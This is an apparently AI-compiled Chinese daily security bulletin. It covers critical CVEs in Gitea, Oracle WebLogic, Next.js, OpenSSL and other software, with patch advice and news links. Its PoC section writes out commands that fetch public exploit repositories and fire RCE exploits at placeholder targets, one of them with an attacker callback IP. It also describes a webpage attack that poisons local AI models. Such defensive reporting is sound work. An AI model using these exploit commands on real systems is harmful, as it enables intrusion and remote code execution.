每日安全情报报告
由 AI 整理发布
覆盖近 48 小时新增高危漏洞、公开 PoC 与安全情报文章
风险等级:🔴 严重 | 🟠 高危 | 🟡 中危 | 🟢 低危
一、最新高危漏洞(近 24--48 小时)
🔴 严重(Critical · 在野利用优先)
| CVE | 漏洞类型 | 受影响组件 | CVSS | 状态 | 链接 |
|---|---|---|---|---|---|
| CVE-2026-60004 | 代码注入(CWE-94)→ RCE(Git hook 注入) | Gitea 1.17 ~ < 1.27.1 | 9.8 | 在野利用 · CISA KEV(8/25 新增) | NVD 详情 · GitHub 安全公告 |
| CVE-2026-21962 | 访问控制绕过(CWE-284)→ 未认证数据完全访问 | Oracle HTTP Server / WebLogic Server Proxy Plug-in 12.2.1.4.0、14.1.1.0.0、14.1.2.0.0 | 10.0 | 在野利用 · CISA KEV(8/24 新增)· 联邦截止日 = 今日 8/27 | NVD 详情 · CISA KEV 目录 |
| CVE-2026-75604 | 路径遍历(CWE-22)→ 敏感信息泄露 → RCE | Next.js(Windows 宿主)>= 13.4、>= 16.0(< 15.5.24 / 16.3.3) | 9.0 | PoC 公开(8/25 披露,多家厂商已复现) | NVD 详情 · GitHub 安全公告 |
CVE-2026-60004(Gitea RCE)要点 :通过 POST /api/v1/repos/{owner}/{repo}/diffpatch 端点提交包含恶意 Git hook 的补丁,在 Git 2.32+ 的 bare 临时克隆上利用 add/add 冲突将可执行 hook 写入 $GIT_DIR/hooks/,以 Gitea 服务账户身份执行任意 shell 命令。默认开启开放注册(open registration)的实例可被匿名攻击者自注册后直接利用。已在真实目标上观测到挖矿类载荷,Nuclei 检测模板已发布。修复版本 1.27.1。
CVE-2026-21962(Oracle WebLogic)要点 :未认证攻击者经 HTTP 可越权创建/删除/修改关键数据并完全访问受影响组件可达数据。补丁自 2026 年 1 月起已发布,但 GreyNoise / CloudSEK 已观测到在野攻击(关联 SNOWLIGHT 下载器投放)。今日为联邦民事机构整改截止日,自建环境亦应视为紧急。
CVE-2026-75604(Next.js)要点 :Windows 文件系统上 FileSystemCache 未对反斜杠(\)转义,攻击者可借 ..%5C 穿越缓存路径读取私密 server-reference-manifest.json 窃取 Server Action 的 encryptionKey,进而伪造闭包绑定 Server Action 请求实现未认证 RCE。前置条件:Windows + Pages/App 双路由共存 + 未启用 Cache Components + 默认文件系统缓存。官方明确无 workaround,Windows 宿主须立即升级。360 / 奇安信 / 多个团队已复现。
🟠 高危(High)
| CVE | 漏洞类型 | 受影响组件 | CVSS | 链接 |
|---|---|---|---|---|
| CVE-2026-75149 | 代码注入(CWE-94)→ MCP 命令执行 | Marimo Notebook < 0.23.15 | 8.8 | NVD 详情 · VulnCheck CNA |
| CVE-2026-77652 | 堆缓冲区溢出(CWE-122) | GNOME Dia WPG 文件导入器(含 0.98+git20260221-1 及 master) | 7.8 | NVD 详情 · Red Hat CVE · Dia Issue #580 |
| OpenSSL 批量修复(15 项 CVE) | QUIC/DTLS/CMS/证书管理等多处远程 DoS、越界读写、空指针解引用 | OpenSSL 4.0、3.6、3.5、3.4、3.0(及部分 1.1.1) | 最高 7.5 | RHSA-2026:25237 · NVD 列表(CVE-2026-14456 等) |
OpenSSL 要点 :Red Hat 于 RHEL 10/9 发布重要安全更新(RHSA-2026:25237 / RHSA-2026:25239),修复 15 项漏洞,多数为可远程触发的拒绝服务(QUIC 服务端单包 double-free、DTLS 内存放大、CMS 越界写等)。官方已发布补丁版本 4.0.2 / 3.6.4 / 3.5.8 / 3.4.7 / 3.0.22,建议优先修补互联网暴露的 QUIC/DTLS/CMP 服务,并注意静态链接副本。
NVIDIA NemoClaw(无 CVE,AI 安全) :Oasis Security 披露 NemoClaw 缺陷------攻击者可借恶意网页在未认证 情况下接管本地 Ollama 实例并向模型注入隐藏指令(模型投毒)。macOS/Linux 已于 v0.0.35 修复,Windows/WSL 路径暂无修复(仅警告)。The Hacker News 报道
🟡 中危 / 持续在野(延续跟踪 · 不要松懈)
| CVE | 组件 | 状态 | 链接 |
|---|---|---|---|
| CVE-2026-73570 | Zimbra Collaboration(OS 命令注入,SNMP 通知触发未认证 RCE) | 持续在野,Shadowserver 报告 ≥274 台公网实例已被攻陷 | NVD 详情 |
| CVE-2026-55040 / CVE-2026-63520 | Microsoft SharePoint(链式未认证 RCE) | 在野利用 · KEV,8500+ 公网服务器 | NVD: 55040 · NVD: 63520 |
| CVE-2026-61979 / CVE-2026-15981 | WordPress miniOrange SAML SSO | 活跃扫描,可伪造断言接管管理员 | NVD: 61979 |
| CVE-2026-18963 | Keycloak(reset-credentials 绕过→未认证账户接管) | PoC 公开,已在野 | NVD 详情 |
| CVE-2026-64849 | MLflow(SSRF) | CISA KEV(8/19 新增),截止 9/2 | NVD 详情 |
二、最新漏洞 PoC
1. Gitea CVE-2026-60004(自动化利用,公开 PoC)
- 原理 :向
diffpatch端点两次提交含恶意hooks/post-receive的补丁,利用 Git 三路回退将可执行 hook 写入 bare 克隆的 hook 目录,命令以 Gitea 服务账户执行;通过新建分支回传命令输出,无需目标出网。 - 依赖:Python 3.7+(仅用标准库,无需 pip 安装)。
- 使用步骤:
bash
git clone https://github.com/imbas007/CVE-2026-60004-POC.git
cd CVE-2026-60004-POC
# 全自动化:注册 → 建仓 → 利用 → 取回结果
python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode full-auto --cmd id
# 仅非侵入式检测
python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode check
- 其他公开仓库 :0xBlackash/CVE-2026-60004
- 修复 :升级至 Gitea 1.27.1+,并关闭公开注册(
DISABLE_REGISTRATION=true)、限制diffpatch端点访问。
2. Next.js CVE-2026-75604(未认证 RCE,公开 PoC)
- 原理 :Windows 文件系统上
FileSystemCache路径拼接未转义反斜杠,借..%5C穿越读取server-reference-manifest.json获取 Server ActionencryptionKey,伪造闭包绑定 Server Action 实现命令执行。 - 依赖 :Python 3.9+;
cryptography、requests。 - 使用步骤:
bash
git clone https://github.com/rafabd1/CVE-2026-75604-poc.git
cd CVE-2026-75604-poc
python -m pip install -r requirements.txt
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP \
--pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
# 指定命令:--command "whoami"
- Sploitus 镜像 :HackSpeak/CVE-2026-75604
- 修复 :升级至 Next.js 15.5.24 或 16.3.3+ ,重新
next build与next start;Windows 宿主在升级前可临时迁移至 Linux 文件系统规避。
3. 其他可用检测 / 复现资源
- Gitea 资产与批量检测:Nuclei 模板「Gitea <= 1.27.0 - Pre-Auth RCE」已发布(critical 级)。
- Next.js 复现镜像 :360 漏洞研究院、奇安信 CERT 均已公开复现截图与本地靶场说明(奇安信通告)。
- Marimo CVE-2026-75149:升级至 0.23.15;避免在不可信笔记本上以 edit 模式打开。
三、网络安全最新文章
- Gitea 严重 RCE 已在野利用,CISA 列入 KEV --- The Hacker News 报道 CVE-2026-60004 的武器化与真实挖矿载荷。阅读原文
- Oracle WebLogic 漏洞纳入 CISA KEV,联邦整改今日截止 --- CyberRecaps 8/26 简报,含 SNOWLIGHT 下载器关联。阅读原文
- OpenSSL 修复 9 项可致远程拒绝服务的漏洞(QUIC/DTLS/CMS) --- AboutDFIR 8/26 资讯汇总。阅读原文
- 恶意网页可污染本地 AI 模型:NVIDIA NemoClaw 缺陷分析 --- Oasis Security 经 THN 披露,本地 Ollama 实例可被未认证接管。阅读原文
- Marimo Notebook 缺陷可在单元格执行前运行 MCP 命令 --- VulnCheck CNA 记录 CVE-2026-75149(CVSS 8.8)。阅读原文
- 超 270 台 Zimbra 服务器在持续攻击中被攻陷 --- DanSec 8/26 每日安全简报(含挪威政府 DDoS、miniOrange SAML 在野扫描等)。阅读原文
- Operation QUICSILVER:以 QUICAgent 后门瞄准缅甸政府与 IT --- The Hacker News 报道疑似中国背景 APT 的钓鱼诱饵攻击链。阅读原文
- WhatsApp 引入多 Passkey 与更强双因素验证,抵御钓鱼 --- The Hacker News 8/25 认证安全报道。阅读原文
部分内容由 AI 辅助生成